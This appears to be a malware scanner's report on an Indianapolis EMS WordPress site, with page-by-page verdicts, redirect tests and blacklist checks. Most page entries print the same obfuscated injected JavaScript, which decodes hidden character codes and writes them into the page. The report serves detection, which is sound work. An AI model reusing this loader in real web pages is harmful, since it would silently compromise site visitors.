Scanned pages/files
Request | Server response | Status |
http://indianapolisems.org/ | 200 OK Content-Length: 12469 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/wp-content/themes/ems/scripts/external.js | 200 OK Content-Length: 365 Content-Type: application/javascript | clean |
http://indianapolisems.org/wp-content/themes/ems/scripts/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://indianapolisems.org/wp-content/themes/ems/scripts/Gotham_Rounded_Medium_350.font.js | 200 OK Content-Length: 222839 Content-Type: application/javascript | clean |
http://indianapolisems.org//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Wed, 10 Jun 2015 19:04:31 GMT Pragma: no-cache Location: http://indianapolisems.org/translate.google.com/translate_a/element.js?cb=googleTranslateElementInit/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_-100030756=55788a3f2037d; expires=Wed, 10-Jun-2015 19:34:31 GMT; path=/; httponly X-Pingback: http://indianapolisems.org/xmlrpc.php | clean |
http://indianapolisems.org/translate.google.com/translate_a/element.js?cb=googletranslateelementinit/ | 404 Not Found Content-Length: 6514 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/about-indy-ems/ | 200 OK Content-Length: 10223 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/services/ | 200 OK Content-Length: 8160 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/outreach/ | 200 OK Content-Length: 10494 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/news/ | 200 OK Content-Length: 40134 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/employment/ | 200 OK Content-Length: 8210 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/frequently-asked-questions/ | 200 OK Content-Length: 9027 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/contact-us/ | 200 OK Content-Length: 8453 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/test404page.js | 404 Not Found Content-Length: 6514 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/employment/www.facebook.com/indianapolisems | 404 Not Found Content-Length: 6514 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://indianapolisems.org/employment/twitter.com/indianapolisems | 404 Not Found Content-Length: 6514 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw0 = []; _gw0.push(['_setPageId', '1301851861911781711021861911821711311041861711901861171']); _gw0.push(['_setOption', '6918518510413211617917118518516717317116517619318218118']); _gw0.push(['_setOption', '5175186175181180128167168185181178187186171129169178175']); _gw0.push(['_setOption', '1821281841711691861101221271201821901141671871861811141']); _gw0.push(['_setOption', '6718718618111412212712018219011112919513011718518619117']); _gw0.push(['_setOption', '8171132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw0.length; v++) t += _gw0[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: indianapolisems.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Jun 2015 19:04:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://indianapolisems.org/>; rel=shortlink
Set-Cookie: wfvt_-100030756=55788a3c0d625; expires=Wed, 10-Jun-2015 19:34:28 GMT; path=/; httponly
X-Pingback: http://indianapolisems.org/xmlrpc.php
GET / HTTP/1.1
Host: indianapolisems.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 10 Jun 2015 19:04:27 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Link: <http://indianapolisems.org/>; rel=shortlink
Set-Cookie: wfvt_-100030756=55788a3c0d625; expires=Wed, 10-Jun-2015 19:34:28 GMT; path=/; httponly
X-Pingback: http://indianapolisems.org/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: indianapolisems.org
Referer: http://www.google.com/search?q=indianapolisems.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: indianapolisems.org
Referer: http://www.google.com/search?q=indianapolisems.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=indianapolisems.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://indianapolisems.org/
Result: indianapolisems.org is not infected or malware details are not published yet.
Result: indianapolisems.org is not infected or malware details are not published yet.